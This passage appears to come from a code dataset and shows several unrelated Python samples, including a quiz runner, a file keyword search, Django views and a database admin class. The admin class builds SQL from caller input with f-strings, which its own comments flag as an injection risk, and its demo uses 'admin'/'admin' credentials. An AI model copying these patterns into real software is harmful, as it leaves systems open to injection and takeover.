    """Administer the quiz on stdin and print the final score.

    Each element of ``questions`` must expose ``prompt`` (text shown to the
    user) and ``answer`` (expected input). One point per exact match.
    """
    score = 0
    for question in questions:
        answer = input(question.prompt)
        if answer == question.answer:
            score += 1
    # f-string instead of chained str() concatenation; same output text.
    print(f"You got {score}/{len(questions)} correct")


run_test(questions)
import os
import time
def search(d):
    """Interactive AND/OR keyword search over an indexed corpus.

    ``d`` appears to be an iterable of (path, text) pairs — ``word[0]`` is
    used as a file path and ``word[1]`` as the searchable text; TODO confirm
    with the caller that builds the index.

    Reads a query from stdin. A query containing "or" (and no "and") prints
    every entry matching at least one term; any other query is treated as an
    AND search and prints entries matching all terms. For each hit the path,
    modification time and file size are printed.
    """
    query = input("query: ")
    # Trim surrounding spaces, split on whitespace, de-duplicate terms.
    query = query.strip(" ").split()
    query = list(set(query))
    if ("or" in query) and ("and" not in query):  # "OR" search
        query.remove("or")
        print("Performing OR search for: ", query)
        for word in d:
            for quote in query:
                if quote in word[1]:
                    print("Found at", word[0])
                    print(time.ctime(os.path.getmtime(word[0])))
                    print(os.path.getsize(word[0]))
                    print('\n')
                    break  # one hit per entry is enough
    elif ("and" in query) or (len(query) == 1) or ("and" not in query) and ("or" not in query):
        if "and" in query:
            query.remove("and")
        if "or" in query:
            query.remove("or")
        print("Performing AND search for: ", query)
        for word in d:
            # BUG FIX: the original kept one running counter across ALL
            # entries and only reset it after a full match, so partial
            # matches leaked into later entries and produced false hits.
            # Count the matching terms per entry instead.
            matches = sum(1 for quote in query if quote in word[1])
            if matches == len(query):
                print("Found at", word[0])
                print(time.ctime(os.path.getmtime(word[0])))
                print(os.path.getsize(word[0]))
                print('\n')
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from pants.backend.experimental.java.register import rules as java_rules
from pants.backend.openapi.codegen.java.rules import rules as java_codegen_rules
def target_types():
    """This backend registers no target types of its own."""
    return list()
def rules():
    """Expose the Java backend rules plus the OpenAPI Java codegen rules."""
    return list(java_rules()) + list(java_codegen_rules())
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, JsonResponse
from secondapp.models import Hospital
# Create your views here.
def index(request):
    """Render the home page with all hospitals ordered by primary key."""
    hospitals = Hospital.objects.order_by('id')
    print(hospitals)  # NOTE(review): debug print left in a view — consider logging
    context = {'hospital_list': hospitals}
    return render(request, 'secondapp/home.html', context)
def index2(request, hospital_id):
    """Render the detail page for one hospital; 404 for an unknown id."""
    hospital = get_object_or_404(Hospital, id=hospital_id)
    context = {'hospital_list2': hospital}
    return render(request, 'secondapp/home2.html', context)
def index3(request):
    """Render home3 with every hospital in database default order."""
    context = {'hospital_list3': Hospital.objects.all()}
    return render(request, 'secondapp/home3.html', context)
import psycopg2
from setup import *
from connection import Connection
from pprint import pprint
from datetime import date
from cus import respprint
class Admin(Connection):
    """Administrator role: CRUD helpers over the shop database.

    Every public method first authenticates through ``Connection._connectDb``
    with the stored credentials and returns the string
    'Incorrect login or password' when that fails.

    NOTE(review): several methods interpolate caller-supplied selectors into
    SQL fragments with f-strings — SQL injection risk; the queries should be
    parameterized inside ``Connection``.
    """

    # Message returned whenever authentication fails; kept byte-identical
    # to the original literal so existing callers keep working.
    _AUTH_ERROR = 'Incorrect login or password'

    def __init__(self, login, password):
        self.login = login
        self.password = password

    # --- private helpers factoring out the repeated auth-check pattern ----

    def _insert(self, table, data):
        """Authenticate, then insert *data* into *table*."""
        if self._connectDb(self.login, self.password):
            return self._postData(table, data)
        return self._AUTH_ERROR

    def _delete(self, table, selector):
        """Authenticate, then delete the rows matching *selector*."""
        if self._connectDb(self.login, self.password):
            return self._deleteData(table, selector)
        return self._AUTH_ERROR

    def _update(self, table, data, selector):
        """Authenticate, then update the rows matching *selector*."""
        if self._connectDb(self.login, self.password):
            return self._updateData(table, data, selector)
        return self._AUTH_ERROR

    # --- public API -------------------------------------------------------

    def register_self(self, data):
        """Create a login row unless a user with this login already exists."""
        table = 'login'
        if self._connectDb(self.login, self.password):
            # _auditDb checks the first value of the first record (the login).
            if self._auditDb(table, list(data[0].values())[0]):
                return self._postData(table, data)
            return 'A user with this login already exists'
        return self._AUTH_ERROR

    def add_product(self, data):
        return self._insert('product', data)

    def add_pr_category(self, data):
        return self._insert('product_category', data)

    def add_employee(self, data):
        return self._insert('employee', data)

    def delete_product(self, selector):
        # NOTE(review): unescaped interpolation — SQL injection risk.
        return self._delete('product', f"product_name = '{selector}'")

    def delete_pr_category(self, selector):
        return self._delete('product_category', f"category_name = '{selector}'")

    def delete_employee(self, selector):
        return self._delete('employee', f"first_name = '{selector}'")

    def delete_customer(self, selector):
        return self._delete('customer', f"first_name = '{selector}'")

    def edit_product(self, data, selector):
        return self._update('product', data, selector)

    def edit_pr_category(self, data, selector):
        return self._update('product_category', data, selector)

    def edit_employee(self, data, selector):
        return self._update('employee', data, selector)

    def get_order_info(self, category, selector=''):
        """Return orders joined with employee, city, customer and product.

        ``category`` may be one of 'city_name', 'date_of_order',
        'product_name' to filter by ``selector``; anything else returns all
        orders. Result is a list of dicts keyed by column name.
        """
        if not self._connectDb(self.login, self.password):
            return self._AUTH_ERROR
        allowed_filters = ['city_name', 'date_of_order', 'product_name']
        table = ('orders o',)
        fields = ("""o.id, concat(e.first_name,' ', e.last_name) as "employee", c.city_name, o.date_of_order, concat(c2.first_name,' ', c2.last_name) as "customer", p.product_name, o.price """,)
        if category and category in allowed_filters and selector:
            # NOTE(review): unescaped interpolation — SQL injection risk.
            where = f"""where {category} = '{selector}'"""
        else:
            where = ''
        join_clause = f""" inner JOIN employee e on e.id = o.employee_id
            inner JOIN city c on c.id = o.city_id
            inner JOIN customer c2 on c2.id = o.customer_id
            inner JOIN product p on p.id = o.product_id {where}"""
        rows = self._getData(table, fields, join_clause)
        # BUG FIX: the fourth key was 'date_of_birth' although the query
        # selects o.date_of_order. (Also replaced the Cyrillic identifier
        # `сhangeRes` with an ASCII name.)
        field_names = ["id", "employee", "city_name", "date_of_order",
                       "customer", "product_name", "price"]
        return [dict(zip(field_names, row)) for row in rows]
if __name__ == '__main__':
    # Demo run: authenticate with the default admin credentials and dump
    # every order placed in London.
    admin1 = Admin('admin', 'admin')
    orders = admin1.get_order_info('city_name', 'London')
    pprint(orders)
|
import unittest
import sys
import os
sys.path.append(os.path.join('..', 'Src'))
from GenderClassification import GenderClassify
class GenderClassificationTestCase(unittest.TestCase):
    """Sanity checks for GenderClassify predictions.

    genderClassify(name) is expected to return a (label, confidence) pair.
    """

    def testGeneralGenderAccuracy(self):
        classifier = GenderClassify()
        confidence = classifier.genderClassify('Adam')[1]
        print(confidence)
        self.assertTrue(confidence > 0.7)

    def testFemale(self):
        classifier = GenderClassify()
        names = ["Anna", "Katrina", "Sabrina", "Samantha"]
        predictions = [classifier.genderClassify(name)[0] for name in names]
        self.assertCountEqual(predictions, ['female'] * 4)

    def testMale(self):
        classifier = GenderClassify()
        names = ["Abdul", "Apostolos", "John", "Thomas"]
        predictions = [classifier.genderClassify(name)[0] for name in names]
        self.assertCountEqual(predictions, ['male'] * 4)
if __name__ == '__main__':
unittest.main() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.